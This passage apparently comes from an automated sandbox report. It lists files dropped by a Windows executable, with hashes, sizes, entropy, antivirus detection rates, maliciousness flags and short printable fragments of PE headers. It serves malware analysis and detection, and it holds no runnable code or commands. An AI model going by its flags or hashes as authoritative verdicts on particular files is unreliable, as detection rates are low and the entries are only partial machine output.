                                                                                      SHA-256:BF85DCD8679D979ABC18D2F6DC76C977D0C4944FA8BD6E9E9E79CF391D9AF68D
                                                                                      SHA-512:A878259E96F9AAEEE58B3D6724A1C93014C651C1C2132BB95E993178EE5C3DC8DE18C5EA3E92DA945CD36848DA2FA1DDE09D8170D89AF7925DFC426D5C4FC411
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g....t...t...t..nu...t..nq...t..np...t..nw...t..~..t...u...t..op...t..oq...t..ot...t..o....t.....t..ov...t.Rich..t.........PE..L...(..b...........!.....z...........".......................................@............@.........................P...X............ ..................H5...0..........T...........................(...@............................................text..._y.......z.................. ..`.rdata..`y.......z...~..............@..@.data...............................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):192904
                                                                                      Entropy (8bit):6.636645354646334
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:DmTgt42zKpbQ3o9a5qhjNtKfhshk1hegecoFi0+fSMupRUar/KeKjnjqt/8RYuD:Nt42zKpbco9a4duveni1KCjA/8X
                                                                                      MD5:040923A27101263F400E2FC3D034F464
                                                                                      SHA1:6B10D630DBECF949AE8AD0458B9AE4A1BD429B1E
                                                                                      SHA-256:D4D0236C1322071B0260505585D84EF3508CDD2311795BEB32D4F40414A68B6E
                                                                                      SHA-512:B01E9CE06E7D47D69FB8CEDFA681D7E697204109CB994C1E6F806F482AE566569FCB4413FC64C904035E661242378BD5E843581FD27BB08C5141A9182892900F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........kjH..9H..9H..9...8_..9...8B..9...8L..9...8M..9A..9D..9H..9(..9..8K..9..8I..9..9I..9..8I..9RichH..9........................PE..L....A.b...........!................................................................{@....@..........................I..@T..0............................/......x...0...............................P...@............................................text...W........................... ..`.rdata..h...........................@..@.data...............................@....rsrc...............................@..@.reloc..x...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):465952
                                                                                      Entropy (8bit):6.994022254769591
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:3M0/y7D0hB6YSwYN7TBedX6TVzoRVpcAyndAxEdWVGJvGdtmW4CNbj0iGQZX3:86x+nwYN7TcdqiRIgNzdtKmQKZX3
                                                                                      MD5:E0F4FE0D8EDCFB24F74A6E24384CA816
                                                                                      SHA1:2CA01E37DEFB4BEF3A49683E2BAAAB4EDF9EA6B2
                                                                                      SHA-256:4B3ECC706403D98E2B02641711DF607DD0CA1FF9E1D354F10B1433B089FDE9DF
                                                                                      SHA-512:F7BD89E911BB46B6343C74F3B5AEC0C25E47E10A6F6D5214EEF1DC0ECCF4CD9F2E47FFE98C03A6736C9CC8391CE0EB4A43E943CB0FCE34A817211737808CD605
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......>...zin.zin.zin...k.pin...o.~in.i.j.rin.(.o.~in.(.k.ein.(.j.vin.(.m.rin.s...^in...o.yin.zio.Qkn...g.lin.....{in.zi..{in...l.{in.Richzin.........................PE..L...;K.d............................."............@.................................v.....@..................................y.........../.............. 4...........P..p....................Q......@Q..@...............p............................text............................... ..`.rdata..............................@..@.data...P...........................@....rsrc..../.......0..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2271624
                                                                                      Entropy (8bit):6.111861111408193
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:kbdAKmjUJeaZA2ItvDh8m31CPwDv3uFfJH1s:kbdAiJnVIlh8Q1CPwDv3uFfJq
                                                                                      MD5:7D69BAB5E94676A0128F49347D27EE5B
                                                                                      SHA1:AC13A33E9E2CD77AD8BFEF46997555E3882EA4D3
                                                                                      SHA-256:B5FE9499748AB5BA0C5AF7CA6F29AB8B2E8DC736EB885078B5F3FF52D1ECEE1C
                                                                                      SHA-512:20FBFE7A1FDD9115010E501C7582CB178B343F482AD77F12F4025B9C1AD093E2378CE38A107DCEF69D0D892D4507AC882B0AFF9EE542ACADB1D67E9F36403C11
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6)m.rH.[rH.[rH.[{0.[fH.[.2.ZpH.[.2.ZyH.[.2.ZxH.[.2.Z{H.[rH.[.H.[.:.Z{H.[.2.Z.J.[.2.ZsH.[.2.[sH.[.2.ZsH.[RichrH.[........................PE..L......b...........!... .............f.......0................................#......i#...@..............................h..l.!.@.....!.|............z"../....".........8........................... ...@.............!.l............................text...C........................... ..`.rdata..&,...0......................@..@.data...TY...`!......H!.............@....idata..e.....!......^!.............@..@.00cfg........!......x!.............@..@.rsrc...|.....!......z!.............@..@.reloc........".......!.............@..B................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):444296
                                                                                      Entropy (8bit):6.637652682261065
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:YDOpY/w0uqGQ9uYf7xqzIT+kUFQbA1Dvjj:YDOaY0ufZUEIT+VFQbkTjj
                                                                                      MD5:6D28ACD594575FB10145E68B0173B58C
                                                                                      SHA1:598CEA15B6CD4ECA4222A2AD05420E551E1C6055
                                                                                      SHA-256:03A7DF20F0DE8B2151298BF7E8499EADD440955CD80CD580F83284B3A5FE8EFC
                                                                                      SHA-512:3083BBB92066CE6C7A11B4C40C73C61C241CCD75ADC0854BEB822E96665449B8C14A7FB99BFB481BA84A7EEBD8D2156658C610F549F2712C2AA149954AB51EE3
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3..`..`..`...`..`..a..`.h`..`..a..`..a..`..a..`{..a..`..a..`..`..`..a5.`..a..`.j`..`..a..`Rich..`........................PE..L...Z..b...........!... .....l......o3.......@............................................@.......................... .......)..h....p.................../.......<......T...............................@............@...............................text...0,.......................... ..`.rdata.......@.......2..............@..@.data...\....P.......>..............@....rsrc........p.......T..............@..@.reloc...<.......>...Z..............@..B................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1255752
                                                                                      Entropy (8bit):6.706649589224519
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:wDQSVc1HrO8LoE5Sd0/CsZ1sOJQbi0/AJYgQ2bZNjITr5Zo8m5G:GQSOHqPZdmZ1T+cYWbZNjIT1Zpm5G
                                                                                      MD5:48BDB26D12FA35986612F3EA3A14C50E
                                                                                      SHA1:CBCD99515D699A4D1439E8670EE97AAF9B00A24B
                                                                                      SHA-256:74DFD7CF0C9115E019FC8668C0E9D575F9E1ABE2AD26FEE28486F2CDA86582F7
                                                                                      SHA-512:154E231B0BE2BE80055132198DBC78B59FF86DE5CE0A33F682334E0765C75AA43AEAB5E0B69EDF89ECC0D12212B5ACFC9A01390340A55BD82A08C87092F46FE7
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........o.o.o....o....o....o....o..u..o.o.no.>..o.7...o.7..o.7....o.7..o.Rich.o.........................PE..L.....3_...........!.....&...........J.......@...............................@............@.........................px......(:..........................H5......@....^..p...................._......P_..@............@...............................text....%.......&.................. ..`.rdata..~....@.......*..............@..@.data...0%...`..."...>..............@....rsrc................`..............@..@.reloc..@............b..............@..B................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):550792
                                                                                      Entropy (8bit):5.778334404370453
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:a5NPkjJdZ3zaiquUXYz9iqtbO/lXY9mdEMTLU2lvzRp:CNPkjr1a9qA1CcEMTLU2lvzRp
                                                                                      MD5:25FE0543CB1872082565928295D7CA75
                                                                                      SHA1:868D731C0A05142D72F6F4334639A8879A1EDF46
                                                                                      SHA-256:9C0D35DAE2E3532223058636611B9BD02E8CCA06842D0D3FC469F4A3AB353917
                                                                                      SHA-512:0D6D92BD0C6014374FAC91C6BD8694A40F0EC942ED0604E76761BBCEEB627ACD27F8440205ACC9B8078F35B26B6C426362D5BDCA4F9380059D101D9D419E52C8
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.....`_..`_..`_..._..`_j.a^..`_.a^..`_j.e^..`_j.d^..`_j.c^..`_n.a^..`_..a_..`_n.d^&.`_n.`^..`_n.._..`_n.b^..`_Rich..`_........................PE..L......b...........!... .....4......."....... ......................................tR....@..........................=...N...........0..s............8.../...@...6...,..8............................,..@............................................text............................... ..`.rdata...k... ...l..................@..@.data....;.......6...v..............@....idata..dA.......B..................@..@.00cfg....... ......................@..@.rsrc...s....0......................@..@.reloc...>...@...@..................@..B........................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):455328
                                                                                      Entropy (8bit):6.698367093574994
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                                      MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                                      SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                                      SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                                      SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):449280
                                                                                      Entropy (8bit):6.670243582402913
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
                                                                                      MD5:1FB93933FD087215A3C7B0800E6BB703
                                                                                      SHA1:A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
                                                                                      SHA-256:2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
                                                                                      SHA-512:79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):970912
                                                                                      Entropy (8bit):6.9649735952029515
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                      MD5:034CCADC1C073E4216E9466B720F9849
                                                                                      SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                      SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                      SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34365320
                                                                                      Entropy (8bit):6.910224211322411
                                                                                      Encrypted:false
                                                                                      SSDEEP:393216:VG0Dvfykbhe+rKC8UA/u0WmQjywrjqljOWj6zhWJBu9SoAA3oBuBCIBD6mqgcnuC:hDRbh3wRnWVyGh8oAmou+F3nD
                                                                                      MD5:BC66134A021083E025446373006CD5B9
                                                                                      SHA1:73A84420588B731DA6FA360734F87FD251359293
                                                                                      SHA-256:BFA5202B7F2EE6AA64FC2EC6EC1C311DBDB75BAB59A31DCB50397C8D1FE7703A
                                                                                      SHA-512:57C84D69EBCBE48544AB5B3A8F9765D5F2C92EDD65CC3516716862AE3AF48E859A21590C1BBFB65B83FFC041C56EC47014F21A8D1F65F866D22E382D51BE5253
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......NR...3.].3.].3.]..G]"3.]..E].3.]..D]J3.]..q].3.].B.\.3.].B.\.3.].B.\[3.].K5].3.]Y..].3.].K%]-3.].3.]z1.].A.\.0.].A.\.3.].A.\.".].A.\.3.].AI].3.].3!].3.].A.\.3.]Rich.3.]................PE..L...b.Qb...........!.....4]......../.L......P]..............................`......>S....@..........................T.......0....... ..8............0.../...0...(.. ...T............................#..@............P].....PP..@....................text...23]......4]................. ..`.rdata..*....P]......8].............@..@.data...x....p.......J..............@....rsrc...8.... ......................@..@.reloc...(...0...*..................@..B................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1237832
                                                                                      Entropy (8bit):6.774462425024677
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:1V0Rlxmog3FUaPOCajxXju/ImNhlc+XcRuPfBHsSyL+g:cAFUfBVuJc+FZsQg
                                                                                      MD5:9D141CBC351EFEBCBC93D00C67EB7E4D
                                                                                      SHA1:3556233D78630A7C79575BF9655A9AA1D34949A5
                                                                                      SHA-256:3CAF963C991482810128D14CCE66A0532C0ED2EACCC1E9F8C0EA718AC1B6B626
                                                                                      SHA-512:3AA2ABA7DCA735C94B3FBC578CB3184D2EDCA8BD131ABCAC47FC50FC52915E3A0A0EDB48478D925FDE66690B1803088F0DF98DBE043E3B1A1F8F010ED14A7E73
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.G.P...P...P...8...P...8...P...8...P...8...P...(g..P...9...P...P...P...9...Q...9...P...9...P...Pc..P...9...P..Rich.P..........PE..L...6..b...........!.....F...................`...............................0......fs....@.........................pS..T....S..,....P..................H5...`..........T...........................8...@............`..,............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...H....p.......X..............@....rsrc........P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):63304
                                                                                      Entropy (8bit):7.064828748142621
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:iXLY4c31ry0y/07fIOlnToIfoCTHaRJKW+5Z1Nq/7UPBPxp:ibE1ryiNTBfT1Nq/YNxp
                                                                                      MD5:04B80A5A986B1B91A4E59BB5D892328F
                                                                                      SHA1:FA311C96AAED8FE0F5F3334EEB8B372179B04013
                                                                                      SHA-256:5174EB6B7592A8A825A99DEC84CCDDBD27CA358E9AF859595F7726F9EFC0CB4E
                                                                                      SHA-512:7586128FB22832EC286F1D16389AD133D3C1EAACC7513E2B215D669DB99A4711A016076EF64662009D2408DF5E53AE4C4E4B3948EEE9E72E5F785E9EB6C37C58
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 6%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................................,....Z............Z......Z......Z......Z.@......(....Z......Rich...........................PE..L...)..b...........!.....d...^.......d..............................................z.....@......................... ...X...x...........................H5..............T...............................@............................................text...+b.......d.................. ..`.rdata...J.......L...h..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):139592
                                                                                      Entropy (8bit):7.472600812444364
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:ckR5roYTVZeeFOd0AI8Sd4RPc93LN0bPmY1rUNvGvUGwFf1Dk7+U35dxMZZ6n33s:ck1cNbW6P8FfC35XA0d2Ruu/7UPXPxi
                                                                                      MD5:8EFFD0539304099370E3463B57B5E6F8
                                                                                      SHA1:4FE6FDC40CE81D2BE6BFB716EF70ADD858EA2204
                                                                                      SHA-256:5652517652F0668516BF8F9CB8C7D3F24A4B2F38ADB35A163887E7EDDA9893B0
                                                                                      SHA-512:BDCF2A160F32E54B9C86BFAD045BC3AB52A9DA25D0CBC707C34BEB3AA5F1DDAE3357735A832DB67CE99F2E351A09AA25FF9D712C8470D288E3D49742BCB0EC1E
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................Rich...........PE..L......b...........!.....................................................................@.......................................... ..................H5..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@.......b........[...T...T..........b...........................b........T...........RSDSz.G.aJ.L....8.......D:\workpath\netOffice\OfficeAid6\bin\Release\soui-sys-resource.pdb..............................T....rdata..T........rdata$zzzdbg.... .......rsrc$01.....,.......rsrc$02....................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1046856
                                                                                      Entropy (8bit):6.765364256854141
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:REFDBcsX2SvwnMdUMvgKJgoyQ8StQwNT/sGpEXFMqUqBcHg2nxWN2S0ceQZVmUtp:yF2fSvwnMdU+J4HStQwNTAcmpmUjGH8
                                                                                      MD5:9318FEFD71FA4A824113FAEBAAA7A0CD
                                                                                      SHA1:300A421943E63FEEDACB5D45DF1EE1AEDAD1742B
                                                                                      SHA-256:DD84978521AACEF1C98CC2C4179561CA79E24AD9ABAA512885FCA182970DDD69
                                                                                      SHA-512:64007162EE1960A5828F488E59646C625DD6F359BA47E98BD5B902494BA97B9A0FCE44BDD566616810E0D0D6290E998F4EC67733745139EDB8E4D9B2EBFF8FE6
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K.*...*...*....H..*...B...*...B...*...B...*...B...*...R...*...R...*..(C...*...*..H+..(C...*..(C...*..(Cp..*...*...*..(C...*..Rich.*..........PE..L...!..b...........!................0c....................................................@.............................|F...R..........................H5......t...`...T...................X...........@............... ............................text............................... ..`.rdata..............................@..@.data....[.......X...t..............@....rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1117136
                                                                                      Entropy (8bit):6.786901390487033
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:fh8isthAmAuXv5jrKc5Xv2mcvIZPoy4R0Nt:58isgwjrKc5XvM0Nt
                                                                                      MD5:2357E85AFEA76C3E143D14D4D5EEADDD
                                                                                      SHA1:EF68655D4119BE43B152BEC0F1C16E50F720AA8B
                                                                                      SHA-256:5E0570E228A3D602227168D56BBAF42FE9E928EDB503B8B09F443B2A297F57DF
                                                                                      SHA-512:75AB477BA48570560908A1D998C503B65BD93808AB90C0AACD451ABAF6D52C7DC6643B37969D665B019F97F7452032182E010CFAB1E35E081CB59B70EA705C6B
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........c.|.0.|.0.|.0..40.|.0.|.0p|.0..Z0.|.0...1.|.0...1.|.0...1.|.0...1.|.0...1.~.0..X0.|.0...1.|.0Rich.|.0................PE..L...M..1...........!.....(...................@...............................0.......H....@A........................@Z......tb...........................!......4...\...T............................"..@............`..p............................text....&.......(.................. ..`.data...,....@.......,..............@....idata.......`.......<..............@..@.rsrc................R..............@..@.reloc..4............X..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):101704
                                                                                      Entropy (8bit):6.8112629390124955
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Tx28c9cFF+0kDiuGzg6BybP5aUr1cSZyL+5511366+86ADbor7b5xOh6wPVwyywp:T5c9PuByDLriSzrGbz+x7PAYQ/YRhxV
                                                                                      MD5:0A3E00DD7D5EC0B02E9824F85DBB0B84
                                                                                      SHA1:213FB9A4966EC2CF62DD9848B403147D1B5FE146
                                                                                      SHA-256:476B55B15ED7B3C65D726EE5D03D8F259DF48DAEBD673C2C8A01113E33BA715C
                                                                                      SHA-512:A174397AF84F0B30345720F1033FF43BAED5FA2D4CA64688DB69A0F1F0D484111B991F2E9C825F44A7B0EAEF46525DD89D8269E6E6FAF33390E1C5C6ED61EB37
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........!..r..r..r...s..rB=.r..r...s..r...s..r...s..r..r..r..r...r...s..r...s..r...r..r..r..r...s..rRich..r........PE..L......b...........!................................................................7.....@.........................p....m..,U.......p...............X..H5..........P...T...............................@............................................text...D........................... ..`.rdata..............................@..@.data...,....`.......F..............@....rsrc........p.......J..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):80128
                                                                                      Entropy (8bit):6.906674531653877
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                                                                      MD5:1B171F9A428C44ACF85F89989007C328
                                                                                      SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                                                                      SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                                                                      SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):3304264
                                                                                      Entropy (8bit):6.8075187454781005
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:yXL7XIGD/4kfcJgkIKYfvnUprUtwarh7tPcITlk8Q16Zt:yXIoQk+gjvvn7tBxWITa8j
                                                                                      MD5:34452C003F814263FAEC422B02F9D1C6
                                                                                      SHA1:B80379DDA2C8474233253F486A4AD19FB6E5C1C1
                                                                                      SHA-256:5D0C9B37119B09473D435C89B02225346FD0644FA724D8D5C0E58F987D4332EC
                                                                                      SHA-512:2F5EC046C86E808960FEEA34E9A62E6A2177290578E497C923513EA9A6B87AA2E0A9A7DEF3EBA9D7D61D49B1F32456FA4A657D5CA6EF15652466911BE0923D7A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$..................-Y=....-Y?.'..-Y>....>.......H....1........+...e......................O......_................>.....>.3......[....>.....Rich...................PE..L......c.................."..................."...@...........................2.......2...@.................................|.,.T.....-..7...........62.H5....0.......+.p.....................+.......+.@............."..............................text...l."......."................. ..`.rdata........".. ....".............@..@.data.........,..t....,.............@....rsrc....7....-..8...2-.............@..@.reloc........0......j0.............@..B........................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1104928
                                                                                      Entropy (8bit):7.0839006177086725
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:KloxRhDlqEc/qw/WqhwFXRWVwjQsy16RflYSyZ3g65MX:8/qw/qCVwjXySfyVX5MX
                                                                                      MD5:B27638C5BF1A03E71D80D04490C41B4A
